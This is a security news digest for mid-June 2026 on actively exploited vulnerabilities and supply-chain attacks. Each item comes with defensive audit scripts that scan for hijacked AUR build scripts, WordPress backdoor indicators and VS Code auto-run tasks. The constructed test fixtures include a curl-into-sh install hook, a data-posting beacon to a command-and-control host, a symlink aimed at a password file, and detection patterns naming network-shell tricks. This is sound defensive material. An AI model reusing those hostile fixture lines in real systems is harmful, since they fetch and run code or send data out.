Programmer’s Digest #189
06/10/2026-06/17/2026 Three Critical FortiSandbox Bugs, LiteSpeed cPanel Plugin Flaw, Over 400 Arch Linux AUR Packages Hijacked and More.
1. Fortinet Warned as Three Critical FortiSandbox Bugs Come Under Attack
Three vulnerabilities in Fortinet FortiSandbox, including one patched just last week, are already being actively exploited, according to cybersecurity firm Defused Cyber.
Two of the flaws, CVE-2026-39813 (CVSS 9.1), a path traversal vulnerability, and CVE-2026-39808 (CVSS 9.8), an OS command injection flaw, allow unauthenticated attackers to achieve code execution through crafted HTTP requests. Patches for both have been available since April.
The third flaw, CVE-2026-25089, is an OS command injection vulnerability in the web UI of FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS that lets unauthenticated attackers execute unauthorized commands via specially crafted HTTP requests. Although it was patched only last week, it is already being exploited in the wild.
Researchers also noted that the exploit for CVE-2026-25089 appears to have been developed with AI assistance and contains bugs, yet attackers are still targeting unpatched systems. The incidents underscore how rapidly attackers are weaponizing newly disclosed vulnerabilities, leaving organizations with increasingly narrow patching windows.
2. CISA Flags LiteSpeed cPanel Plugin Flaw Exploited for Root Privilege Escalation
CISA has added a LiteSpeed cPanel Plugin vulnerability, CVE-2026-54420 (CVSS 8.5), to its KEV catalog. Federal agencies must apply fixes by June 18, 2026.
The flaw is a privilege-escalation issue affecting shared hosting servers running CloudLinux with CageFS. Because LiteSpeed cPanel Plugin versions before 2.4.8 do not safely handle user-provided symlinks, an attacker who already has FTP or web shell access as a hosting user can potentially gain root privileges. Details of the active exploitation remain unclear. LiteSpeed recommends checking affected servers with the grep command it provides: no output means the server is likely unaffected, while any output should be reviewed against the additional indicators LiteSpeed lists to rule out false positives.
The issue was reported by Namecheap on May 31, 2026. Users should upgrade to LiteSpeed WHM Plugin 5.3.2.1 (which ships cPanel Plugin 2.4.8) or later to remediate the vulnerability.
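The bug class behind this item, a privileged helper acting on a path that a hosting user controls, is easy to reproduce without the plugin. The script below is an added illustration, not LiteSpeed's code and not the grep check from its advisory: it contrasts a naive reader that follows whatever a path points at with one that canonicalises the path first, using a constructed scratch directory in place of a real hosting account and a stand-in file in place of /etc/shadow. It assumes GNU coreutils (readlink -f).

```shell
# Added illustration, not LiteSpeed's code: a helper that runs as root on behalf
# of a hosting user must not act on a user-supplied path as given, because the
# user can replace any component of it with a symlink to a file they do not own.

# Naive variant: follows whatever the path points at.
unsafe_read() {
  cat "$1"
}

# Hardened variant: canonicalise both the allowed base and the requested path,
# then refuse anything whose real location is outside the base.
# (readlink -f is GNU coreutils; assumed available.)
safe_read() {
  base=$(readlink -f "$1") || return 2
  target=$(readlink -f "$2") || return 2
  case "$target" in
    "$base"/*) cat "$target" ;;
    *) echo "refused: $2 resolves to $target, outside $base" >&2; return 1 ;;
  esac
}

# Constructed scenario in a scratch directory: alice's web root holds a file
# named like an ordinary config file that is really a symlink to a root-only
# file (a stand-in for /etc/shadow, created here so the demo needs no root).
setup_scenario() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/home/alice/public_html" "$tmp/etc"
  printf 'root:$6$secret\n' > "$tmp/etc/shadow"
  printf 'Options -Indexes\n' > "$tmp/home/alice/public_html/real.conf"
  ln -s "$tmp/etc/shadow" "$tmp/home/alice/public_html/.htaccess"
  echo "$tmp"
}

# Walkthrough: the naive reader hands back the root-only file through the
# symlink; the hardened one serves the real config and refuses the symlink.
d=$(setup_scenario)
unsafe_read "$d/home/alice/public_html/.htaccess"
safe_read "$d/home/alice/public_html" "$d/home/alice/public_html/real.conf"
safe_read "$d/home/alice/public_html" "$d/home/alice/public_html/.htaccess" || true
rm -rf "$d"
```

Even the hardened variant is only a demonstration of the check: between readlink and cat the user can swap the link back, so a real fix either opens with O_NOFOLLOW or, better, drops to the user's own privileges before touching anything in their tree, which is the job CageFS-style jailing is meant to do.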
3. Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit
Attackers hijacked more than 400 packages in the Arch User Repository (AUR), modifying build scripts to install malware that steals credentials from systems that build or update affected packages. The official Arch Linux repositories were not impacted.
Dubbed Atomic Arch by Sonatype, the campaign targeted abandoned AUR packages, which the attackers adopted and then modified. Malicious code inserted into the PKGBUILD and .install scripts made systems building the package download and execute a Rust-based credential stealer by way of malicious npm packages such as atomic-lockfile. The stealer targets browser cookies, developer tokens, SSH keys, cloud credentials, and messaging app sessions. When it runs with root privileges (which a package's .install scriptlet gets when pacman installs the built package), it can also deploy an optional eBPF rootkit for stealth and persistence.
Researchers identified more than 400 compromised packages, with additional malicious packages linked to a second payload distributed through js-digest. Users who installed or updated AUR packages after June 11 should review affected package lists, rotate credentials, check for persistence mechanisms, and consider rebuilding compromised systems from trusted media.
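Everything makepkg and pacman execute for an AUR package is in two small shell files, the PKGBUILD and the optional .install scriptlet, so the practical defence is to read them before building. The script below is an added example, not Sonatype's or Arch's tooling: it greps those files for the behaviours described above (fetching and running code at build or install time outside the declared source array) and runs it against two constructed packages, one ordinary and one hijacked. The package name, URLs and script bodies are invented for the example; only the npm package name atomic-lockfile is taken from the report.

```shell
# Added example (not Sonatype's or Arch's tooling): audit the files makepkg and
# pacman will execute before building an AUR package. Each pattern is an
# indicator that warrants reading the file, not proof of compromise. Note that
# curl/wget inside a PKGBUILD is suspicious on its own: legitimate downloads
# belong in source=() where makepkg checksums them.
audit_aur_package() {
  dir=$1
  hits=0
  for f in "$dir/PKGBUILD" "$dir"/*.install; do
    [ -f "$f" ] || continue
    for pat in \
      'curl[[:space:]]' 'wget[[:space:]]' \
      'npm[[:space:]]+(install|i|exec)' 'npx[[:space:]]' \
      'base64[[:space:]]+(-d|--decode)' 'eval[[:space:]]' \
      '/dev/tcp/' '\|[[:space:]]*(ba)?sh([[:space:];&|]|$)' \
      'systemctl[[:space:]]+(enable|start)' 'crontab'; do
      if grep -nE "$pat" "$f" >/dev/null; then
        echo "$(basename "$f"): matches /$pat/"
        echo "  $(grep -nE "$pat" "$f" | head -1)"
        hits=$((hits + 1))
      fi
    done
  done
  echo "$hits indicator(s)"
  [ "$hits" -eq 0 ]
}

# Two constructed packages. The clean one declares everything in source=();
# the hijacked one adds a prepare() that pulls an undeclared npm package and an
# .install scriptlet (run as root by pacman) that pipes a download into sh.
make_sample_packages() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/clean" "$tmp/hijacked"
  cat > "$tmp/clean/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() { cd "example-tool-$pkgver"; make; }
package() { cd "example-tool-$pkgver"; make DESTDIR="$pkgdir" install; }
EOF
  cat > "$tmp/hijacked/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=2
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
prepare() { cd "$srcdir"; npm install atomic-lockfile >/dev/null 2>&1; }
build() { cd "example-tool-$pkgver"; make; }
package() { cd "example-tool-$pkgver"; make DESTDIR="$pkgdir" install; }
EOF
  cat > "$tmp/hijacked/example-tool.install" <<'EOF'
post_install() { curl -fsSL https://example.invalid/x | sh; }
EOF
  echo "$tmp"
}

# Walkthrough: the clean package reports 0 indicators, the hijacked one 3
# (npm install in PKGBUILD; curl and a pipe into sh in the .install script).
d=$(make_sample_packages)
audit_aur_package "$d/clean" || true
audit_aur_package "$d/hijacked" || true
rm -rf "$d"
```

For the post-June-11 review the item calls for, pacman -Qm lists every package not present in the sync databases, which on a typical system is exactly the AUR-built set; diff that list against the published affected-package list, and treat a match as grounds for the credential rotation and rebuild the item recommends rather than for a cleanup attempt on a host that may carry an eBPF rootkit.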
4. OptinMonster Plugin Hack Exposes 1.2 Million WordPress Sites to Cyberattack
A major supply chain attack has exposed more than 1.2 million WordPress websites after attackers injected malicious code into JavaScript files distributed through trusted CDN infrastructure. Security researchers at Sansec found that popular Awesome Motive plugins, including OptinMonster, TrustPulse, and PushEngage, were affected.
Rather than attacking individual websites, the attackers compromised JavaScript files hosted on Awesome Motive's CDN, so every site that loaded those files ran the malicious code in its visitors' browsers. The payload activates only when a WordPress administrator is logged in, which helps it evade detection.
Once active, the malware collects site data, steals authentication tokens, and creates unauthorized administrator accounts such as developer_api1 or randomly generated dev_xxxxxx accounts. Stolen data is encrypted and sent to the command-and-control domain tidio.cc.
Attackers also install hidden backdoor plugins, including content-delivery-helper and database-optimizer, enabling remote code execution and long-term access. Organizations should check for these indicators and suspicious administrator accounts immediately.
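The report names three concrete indicators: two backdoor plugin slugs, a pattern for the rogue administrator accounts, and the command-and-control host. The script below is an added triage example, not Sansec's or Awesome Motive's code, that checks one WordPress install for all three. It reads the administrator list from a file so that it runs offline against a constructed site tree; on a live site that list comes from wp user list --role=administrator --field=user_login (assuming WP-CLI is installed) or from wp_users joined to wp_usermeta on wp_capabilities. The sample file names, the beacon snippet and the account names other than developer_api1 are constructed for the example.

```shell
# Added triage script (not Sansec's or Awesome Motive's code): check one
# WordPress install for the indicators named in the report.
wp_triage() {
  root=$1
  admins=$2
  hits=0
  # 1. Backdoor plugin directories named in the report.
  for slug in content-delivery-helper database-optimizer; do
    if [ -d "$root/wp-content/plugins/$slug" ]; then
      echo "plugin present: $slug"
      hits=$((hits + 1))
    fi
  done
  # 2. Administrator accounts matching the reported names. The six-character
  #    suffix is taken literally from "dev_xxxxxx"; widen it if your site shows
  #    other lengths.
  while IFS= read -r user; do
    case "$user" in
      developer_api1)
        echo "admin account: $user (reported name)"; hits=$((hits + 1)) ;;
      *)
        if printf '%s\n' "$user" | grep -Eq '^dev_[A-Za-z0-9]{6}$'; then
          echo "admin account: $user (dev_xxxxxx pattern)"; hits=$((hits + 1))
        fi ;;
    esac
  done < "$admins"
  # 3. The C2 host in any JavaScript under the site root (plugin bundles, page
  #    cache, uploads). The host is anchored on both sides so unrelated domains
  #    that merely contain the string are not flagged.
  js_hits=$(find "$root" -name '*.js' \
    -exec grep -lE '(^|[^A-Za-z0-9.-])tidio\.cc([^A-Za-z0-9-]|$)' {} + | wc -l | tr -d ' ')
  if [ "$js_hits" -gt 0 ]; then
    echo "C2 domain tidio.cc referenced in $js_hits JavaScript file(s)"
    hits=$((hits + 1))
  fi
  echo "$hits indicator(s)"
  [ "$hits" -eq 0 ]
}

# Constructed site tree: one legitimate plugin, one backdoor plugin, a cached
# script carrying a made-up beacon to the C2 host, and an admin list with two
# rogue accounts among two real ones.
make_sample_site() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/wp-content/plugins/optinmonster" \
           "$tmp/wp-content/plugins/content-delivery-helper" \
           "$tmp/wp-content/cache"
  printf 'window.om_api = {};\n' > "$tmp/wp-content/plugins/optinmonster/om.js"
  printf 'fetch("https://tidio.cc/collect", {method: "POST", body: d});\n' \
    > "$tmp/wp-content/cache/page.js"
  printf 'admin\nalice\ndeveloper_api1\ndev_k3j9q2\n' > "$tmp/admins.txt"
  echo "$tmp"
}

# Walkthrough: the constructed site reports 4 indicators.
d=$(make_sample_site)
wp_triage "$d" "$d/admins.txt" || true
rm -rf "$d"
```

A clean result from this script only means the three published indicators are absent; because the malicious code was served from the CDN rather than written to disk, the plugin files on the server can look untouched, so the admin-account and backdoor-plugin checks are the ones that actually show whether the payload ever ran against a logged-in administrator.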
5. CVE-2026-20262: Cisco Catalyst SD-WAN Flaw Under Active Targeted Exploitation
Cisco has warned that CVE-2026-20262, an actively exploited vulnerability in Cisco Catalyst SD-WAN Manager, could allow authenticated attackers to create or overwrite files on affected systems. The flaw, rated CVSS 6.5, stems from improper validation of user input during file uploads in the web interface.
By sending a crafted HTTP request to a vulnerable API endpoint, an attacker with valid low-privileged credentials and write access can perform arbitrary file writes. These files may then be used to escalate privileges to root, potentially leading to full system compromise. Cisco’s Product Security Incident Response Team (PSIRT) has observed limited exploitation of the flaw since June 2026 and strongly recommends upgrading to a patched software version. While technical details of the attacks have not been disclosed, the targeted nature of the activity suggests involvement by a sophisticated threat actor. CISA has added CVE-2026-20262 to its KEV catalog and ordered federal agencies to apply fixes by June 29, 2026.
6. North Korean Hackers Are Turning Developer Tools Into Malware Delivery Channels
Cybersecurity researchers have identified two malicious campaigns linked to the North Korean threat cluster known as Contagious Interview. Proofpoint reports the activity, dubbed UNK_DeadDrop, uses recruitment-themed phishing emails posing as developer job offers or code reviews to target nearly 100 organizations across finance, crypto, education, and tech.
The infection chain begins with emails linking to attacker-controlled GitHub repositories containing malicious scripts. Victims are instructed to open the project in VS Code, which triggers cross-platform malware for Windows, macOS, and Linux, including a modified Overlord framework. A key technique is a task in the repository's .vscode/tasks.json whose runOptions set “runOn” to “folderOpen”, which makes VS Code run the task's command automatically as soon as the folder is opened.
The malware installs loaders that deploy a malicious VSIX extension disguised as a Google service, enabling remote command execution, data theft, and credential harvesting, particularly from crypto wallets. Stolen data is exfiltrated to a command-and-control server. Researchers note the campaign has evolved from social-media-based fake interviews to large-scale email phishing, indicating increasing operational scale and sophistication among North Korean-aligned actors.
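The folderOpen trigger lives in a file that ships with the repository, so it can be inspected before the folder is ever opened in the editor. The script below is an added pre-flight check, not Proofpoint's tooling: it lists any task VS Code would launch on its own from a checkout and runs against two constructed repositories, one carrying such a task and one with an ordinary test task. The task label, script path and commands in the sample files are invented for the example.

```shell
# Added pre-flight check (not Proofpoint's tooling): before opening a repository
# that arrived with a job offer, list any task VS Code would launch on its own.
# Workspace task definitions live in .vscode/tasks.json and *.code-workspace
# files; a task with "runOn": "folderOpen" starts as soon as the folder is
# opened in a trusted workspace.
find_auto_tasks() {
  repo=$1
  found=0
  for f in "$repo/.vscode/tasks.json" "$repo"/*.code-workspace; do
    [ -f "$f" ] || continue
    if grep -Eq '"runOn"[[:space:]]*:[[:space:]]*"folderOpen"' "$f"; then
      found=$((found + 1))
      echo "$f: defines a folderOpen task"
      # Show what would run. This is a grep over JSON, enough for a first look;
      # read the whole file before deciding whether to trust the folder.
      grep -nE '"(label|type|command|args)"' "$f" | sed 's/^/  /'
    fi
  done
  echo "$found file(s) with automatic tasks"
  [ "$found" -eq 0 ]
}

# Two constructed repositories. The lure's task runs a script from the checkout
# the moment the folder is opened; the ordinary one only defines a test task
# that runs when asked.
make_sample_repo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/lure/.vscode" "$tmp/ordinary/.vscode"
  cat > "$tmp/lure/.vscode/tasks.json" <<'EOF'
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "prepare dev environment",
      "type": "shell",
      "command": "node",
      "args": [".devtools/setup.js"],
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
EOF
  cat > "$tmp/ordinary/.vscode/tasks.json" <<'EOF'
{
  "version": "2.0.0",
  "tasks": [
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}
EOF
  echo "$tmp"
}

# Walkthrough: the lure reports 1 file with automatic tasks, the ordinary
# repository 0.
d=$(make_sample_repo)
find_auto_tasks "$d/lure" || true
find_auto_tasks "$d/ordinary" || true
rm -rf "$d"
```

VS Code runs folderOpen tasks only once the folder has been trusted through Workspace Trust, so the "click Trust to see the code" step in a lure like this is the moment the attack needs; keeping unfamiliar checkouts in Restricted Mode, and reading .vscode/settings.json and extensions.json alongside tasks.json, removes the automatic trigger without preventing a code review.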